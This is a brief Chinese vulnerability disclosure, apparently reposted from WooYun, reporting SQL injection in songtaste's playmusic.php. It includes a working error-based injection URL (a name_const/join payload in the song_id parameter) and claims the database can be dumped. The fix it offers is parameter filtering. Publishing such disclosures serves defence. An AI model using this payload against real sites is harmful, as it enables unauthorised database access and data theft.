简要描述:songtaste某文件注射,可直接脱裤 详细说明:playmusic.php对提交的参数无过滤,导致注射 漏洞 证明:http://songtaste测试数据/playmusic.php?song_id=88)%20xor(select%20*%20from%20(%20select%20*%20from%20(select%20name_const(version(),0)%20)a%20join%20(select%20name_const(version(),0)%20)b)c)%23 你懂的 修复方案:过滤提交参数 版权声明:转载请注明来源H3len@乌云
查看更多关于songtaste注射及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12520